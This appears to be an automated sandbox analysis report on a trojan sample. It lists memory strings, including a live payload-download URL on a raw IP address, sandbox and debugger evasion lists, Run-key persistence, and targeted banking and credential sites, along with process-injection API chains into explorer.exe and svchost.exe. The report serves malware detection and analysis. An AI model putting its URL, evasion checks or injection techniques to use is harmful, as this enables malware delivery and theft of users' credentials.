Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000002.2070000024.0000025F1A96C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000003.00000002.3311346197.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe Binary or memory string: vboxservice.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000003.00000002.3311346197.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe Binary or memory string: vboxtray.exe
Source: explorer.exe, 00000003.00000002.3311346197.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe Binary or memory string: vmware.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: invalid string positionstring too longwcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegevector<T> too longReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeMicrosoftEdgeUpdatebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exegeorgeAbbyDarrel JonesJohnJohn ZalinskyJohn DoeSHCtAGa3rmUV0U6479boGY8wjXNBzWALKERoxYT3lZggZMKt3wObOwwaWuh6PNjaakw.qsMdVVcp06AAy3mLfaNLLPJPQlavKFb0Lt07HV8BUt5BIsCZaFgxGd9fq4Iv8FrankAnnawdagutilityaccountWDAGUtilityAccounthal9thvirusmalwaresandboxsamplecurrentuseremilyhapubwshong leeit-adminjohnsonmillermilozsmicrosoftsand boxmaltestPaul JonesvmrayDiamotrix{%08lX%04lX%lu}ZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release\drivers\etc\hostsvirustotal
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 5BB2.tmp.x.exe, 00000006.00000002.2532152528.0000000005D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: {B268D441C1ED2974164258}.exe, 00000004.00000003.2165638351.00000243851AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\)pL
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe Binary or memory string: vmware-vmx.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000003.00000000.2100969793.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\explorer.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\svchost.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF943C40 IsDebuggerPresent,ExitProcess,GetModuleFileNameW,PathFindFileNameW,CreateMutexA,GetLastError,CloseHandle,ExitProcess,GetModuleHandleA,VirtualProtect,ExitProcess,ExitProcess, 0_2_00007FF6CF943C40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95D0B4 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00007FF6CF95D0B4
Source: C:\Windows\explorer.exe Code function: 3_2_08B721B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle, 3_2_08B721B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF941B30 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingA,CloseHandle,CloseHandle,VirtualFree, 0_2_00007FF6CF941B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9605F0 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,_write_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock, 0_2_00007FF6CF9605F0
Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF956D84 SetUnhandledExceptionFilter, 0_2_00007FF6CF956D84
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF956BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6CF956BC8
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB6D84 SetUnhandledExceptionFilter, 4_2_00007FF6BCCB6D84
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB6BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF6BCCB6BC8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA76D84 SetUnhandledExceptionFilter, 5_2_00007FF78FA76D84
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA76BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00007FF78FA76BC8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C6BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00007FF7A34C6BC8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C6D84 SetUnhandledExceptionFilter, 9_2_00007FF7A34C6D84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00007FF779EA9924
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00007FF779E9C44C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00007FF779E9BBC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E9C62C SetUnhandledExceptionFilter, 10_2_00007FF779E9C62C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF779EA9924
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF779E9C44C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF779E9BBC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E9C62C SetUnhandledExceptionFilter, 12_2_00007FF779E9C62C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836CC28 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF8B836CC28
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83422DC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8B83422DC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB65054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF8BFB65054
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB64A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8BFB64A34
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF8BFB76810
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8BFB75DF8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB769F8 SetUnhandledExceptionFilter, 12_2_00007FF8BFB769F8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8BFB9D414
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F566D84 SetUnhandledExceptionFilter, 13_2_00007FF67F566D84
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F566BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF67F566BC8
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: 7DF0.tmp.zx.exe.3.dr Jump to dropped file
Source: C:\Windows\explorer.exe Network Connect: 176.111.174.140 80 Jump to behavior
Source: C:\Windows\explorer.exe Code function: 3_2_08B7E948 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free, 3_2_08B7E948
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9437F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 0_2_00007FF6CF9437F8
Source: C:\Windows\explorer.exe Code function: 3_2_08B7D180 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 3_2_08B7D180
Source: C:\Windows\explorer.exe Code function: 3_2_08B7CEB4 OpenProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle, 3_2_08B7CEB4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA37F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 4_2_00007FF6BCCA37F8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA637F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 5_2_00007FF78FA637F8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B37F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 9_2_00007FF7A34B37F8
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F5537F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 13_2_00007FF67F5537F8
Source: C:\Windows\System32\svchost.exe Thread created: C:\Windows\explorer.exe EIP: 335C698
Source: C:\Windows\System32\svchost.exe Memory written: C:\Windows\explorer.exe base: 3350000 value starts with: 4D5A
Source: C:\Windows\System32\svchost.exe Memory written: PID: 1028 base: 3350000 value: 4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Thread register set: target process: 412
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Thread register set: target process: 6760
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Thread register set: target process: 3876
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Thread register set: target process: 4284
